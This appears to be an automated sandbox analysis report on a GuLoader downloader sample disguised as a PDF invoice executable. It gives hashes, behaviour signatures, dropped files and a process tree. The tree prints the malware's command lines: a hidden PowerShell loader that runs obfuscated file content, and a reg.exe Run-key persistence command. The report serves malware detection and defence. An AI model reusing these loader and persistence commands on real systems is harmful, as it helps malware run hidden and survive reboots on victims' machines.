Overview
overview
10Static
static
3faktura_71...df.exe
windows7-x64
10faktura_71...df.exe
windows10-2004-x64
8$PLUGINSDI...sh.dll
windows7-x64
3$PLUGINSDI...sh.dll
windows10-2004-x64
3$PLUGINSDI...ge.dll
windows7-x64
1$PLUGINSDI...ge.dll
windows10-2004-x64
1$PLUGINSDI...fo.dll
windows7-x64
3$PLUGINSDI...fo.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
27-06-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
faktura_7171503997·pdf.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
faktura_7171503997·pdf.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/AdvSplash.dll
Resource
win7-20240611-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/AdvSplash.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240611-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win7-20231129-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240508-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240508-en
General
-
Target
faktura_7171503997·pdf.exe
-
Size
648KB
-
MD5
af7493a9e9ea9a5181ebc8ba0c3bb7bc
-
SHA1
809de7c88d3a53a4ec803c37e232c12037c48911
-
SHA256
a77c2d0242aa3601ba7b257ab9bdb4fcb717f64a8cd6da3178e517bb2843f2eb
-
SHA512
214bef965ff2a8113c05fd371173c72fd94c36e9bfefc102858d2aab4c0f2c0f03773835405d1e489f5ce73243cb2b5b84d256a90d5cc5a8356dfce9b45b1226
-
SSDEEP
6144:z9KOQS4B4GMSGJpFhsiivgUroam4nt5wf1CEH/+57/B0wU683FbyZc3q64drI1RJ:zsB4GOsPoamI4dCEm5750wUB3F+xxw
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 4 IoCs
Processes:
faktura_7171503997·pdf.exepid process 2212 faktura_7171503997·pdf.exe 2212 faktura_7171503997·pdf.exe 2212 faktura_7171503997·pdf.exe 2212 faktura_7171503997·pdf.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Schultz = "%Enterotomy% -windowstyle minimized $Mesopleural=(Get-ItemProperty -Path 'HKCU:\\Duerne16\\').Bureaukratisme;%Enterotomy% ($Mesopleural)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2292 wab.exe 2292 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 1776 powershell.exe 2292 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1776 set thread context of 2292 1776 powershell.exe wab.exe -
Drops file in Windows directory 1 IoCs
Processes:
faktura_7171503997·pdf.exedescription ioc process File opened for modification C:\Windows\Fonts\anorakkerne.ini faktura_7171503997·pdf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1776 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
faktura_7171503997·pdf.exepowershell.exewab.execmd.exedescription pid process target process PID 2212 wrote to memory of 1776 2212 faktura_7171503997·pdf.exe powershell.exe PID 2212 wrote to memory of 1776 2212 faktura_7171503997·pdf.exe powershell.exe PID 2212 wrote to memory of 1776 2212 faktura_7171503997·pdf.exe powershell.exe PID 2212 wrote to memory of 1776 2212 faktura_7171503997·pdf.exe powershell.exe PID 1776 wrote to memory of 2292 1776 powershell.exe wab.exe PID 1776 wrote to memory of 2292 1776 powershell.exe wab.exe PID 1776 wrote to memory of 2292 1776 powershell.exe wab.exe PID 1776 wrote to memory of 2292 1776 powershell.exe wab.exe PID 1776 wrote to memory of 2292 1776 powershell.exe wab.exe PID 1776 wrote to memory of 2292 1776 powershell.exe wab.exe PID 2292 wrote to memory of 1908 2292 wab.exe cmd.exe PID 2292 wrote to memory of 1908 2292 wab.exe cmd.exe PID 2292 wrote to memory of 1908 2292 wab.exe cmd.exe PID 2292 wrote to memory of 1908 2292 wab.exe cmd.exe PID 1908 wrote to memory of 2296 1908 cmd.exe reg.exe PID 1908 wrote to memory of 2296 1908 cmd.exe reg.exe PID 1908 wrote to memory of 2296 1908 cmd.exe reg.exe PID 1908 wrote to memory of 2296 1908 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\faktura_7171503997·pdf.exe"C:\Users\Admin\AppData\Local\Temp\faktura_7171503997·pdf.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Falmedes=Get-Content 'C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Indstningernes.Svi';$Almuten=$Falmedes.SubString(68669,3);.$Almuten($Falmedes)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Schultz" /t REG_EXPAND_SZ /d "%Enterotomy% -windowstyle minimized $Mesopleural=(Get-ItemProperty -Path 'HKCU:\Duerne16\').Bureaukratisme;%Enterotomy% ($Mesopleural)"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Schultz" /t REG_EXPAND_SZ /d "%Enterotomy% -windowstyle minimized $Mesopleural=(Get-ItemProperty -Path 'HKCU:\Duerne16\').Bureaukratisme;%Enterotomy% ($Mesopleural)"5⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Gyptologiske.UdlFilesize
334KB
MD5736d09ecac96c2df1113a1a8cba47a69
SHA1e335b76dafc2a78ff57db7bb2cbaf84c0a5aeb81
SHA256848eeb17eac68ad07de0c7deee17f38a5e9fbe41c105323fccd7138770384167
SHA512bd51abcdb99d5df07da84e862d93ebd6d9940f112f602a550a492dfbcc9e7ab75233b10716f123b95f3bc2ac528a327bba75c82779a4966327a1cae0e38a306c
-
C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Indstningernes.SviFilesize
67KB
MD5aa8fd270726e1b8912b67cfd401820dd
SHA12368c97236dcca147773e395eeca9501a805888c
SHA2560f70c603d4b3a4aa5790a4caf3514dc0860b2203c7c2ef4aac1be3e40cef385a
SHA5123aa23daa46c6d712bbff250fc38002fede249419f10cd2be909e20e095d7320d8f4792cf42009038cd95c7b448ea16a5d0c0fab1823e0fb8f28827827a55f299
-
C:\Users\Admin\Pictures\slukningen.lnkFilesize
1010B
MD5cf1080a2c5771c8ec23b2839c247c1f0
SHA1ac2d22722bb356b5c70cceccf41c4c099565f82e
SHA256b8a205c5130d83fcf735ae48fdcba6f68e6d7dc391fdfa5e0e55e32ebcb07748
SHA5124c7f785bebac2fdbcc7364a8091001d3c5b3f4b5b0c8c0f21321ea8a52e23b938c1a289dee64c7bb4a7f6821b5d2d6b23b1b6d8af655fb8e31c78c0ff6161313
-
\Users\Admin\AppData\Local\Temp\nsd22AE.tmp\AdvSplash.dllFilesize
6KB
MD56def2cf3daf850acdc1a3e7340a439c4
SHA195d0d26f60cd5af697502cd5e53a54913ab188fb
SHA2563ec3cf21a99ab0533ec2c451df3b5542733f70b972089d5c321ad7ae3b87d175
SHA51216b1cf4783284d4a1282c569f5c416c713b4b339efcd4d3948bdf7da2194c597bd732d07ba9fabafcab323ba8c8da68845d4435ab9d1916b1810087ee1f5c413
-
\Users\Admin\AppData\Local\Temp\nsd22AE.tmp\BgImage.dllFilesize
7KB
MD52bb17d45e5ad92053ce1e500408dd8a9
SHA1f5d3a7ee6e28df532e9ce33976c92ff30a5665e4
SHA25671ce676703dad028e4083e6b960b1ed89885877079d46d5021506eaa6d99db53
SHA512efdcb476b9b9b5691fe6b9cd77ecbe48d50c6683da01fd51c6b428cc262528fb3dcd295abe28718321b2307b0e032fcb599588f1eb00a93fd9e6a1f7b322b41f
-
\Users\Admin\AppData\Local\Temp\nsd22AE.tmp\UserInfo.dllFilesize
4KB
MD58ef0e4eb7c89cdd2b552de746f5e2a53
SHA1820f681e7cec409a02b194a487d1c8af1038acf0
SHA25641293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc
SHA512a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5
-
\Users\Admin\AppData\Local\Temp\nsd22AE.tmp\nsExec.dllFilesize
6KB
MD5c129bc26a26be6f5816a03520bb37833
SHA118100042155f948301701744b131c516bf26ddb8
SHA256d3694fa0503158194129d113fcc1c83177ff5a5f93d898ce0bcfe9ce12f06bf4
SHA512dbe79859c41e00a6e951cee889e7f0de29a712792fb531662285a2d6e384884518c7d5d983894c185b3d31d81213d2477cf4576b0114d352b759fe07a1704e63
-
memory/1776-159-0x0000000073C40000-0x00000000741EB000-memory.dmpFilesize
5.7MB
-
memory/1776-158-0x0000000073C40000-0x00000000741EB000-memory.dmpFilesize
5.7MB
-
memory/1776-162-0x0000000073C40000-0x00000000741EB000-memory.dmpFilesize
5.7MB
-
memory/1776-157-0x0000000073C41000-0x0000000073C42000-memory.dmpFilesize
4KB
-
memory/1776-164-0x0000000073C40000-0x00000000741EB000-memory.dmpFilesize
5.7MB
-
memory/1776-165-0x0000000006810000-0x000000000A15D000-memory.dmpFilesize
57.3MB
-
memory/1776-166-0x0000000073C40000-0x00000000741EB000-memory.dmpFilesize
5.7MB
-
memory/2292-188-0x0000000001A00000-0x000000000534D000-memory.dmpFilesize
57.3MB